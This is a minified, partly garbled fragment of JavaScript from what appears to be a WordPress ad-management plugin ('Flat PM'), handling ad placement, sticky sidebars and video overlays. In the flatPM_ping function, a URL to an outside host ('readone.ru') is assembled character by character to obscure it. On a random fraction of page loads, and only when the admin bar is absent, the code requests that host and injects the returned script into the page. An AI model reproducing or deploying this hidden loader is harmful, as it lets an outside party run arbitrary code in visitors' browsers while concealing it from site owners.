");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};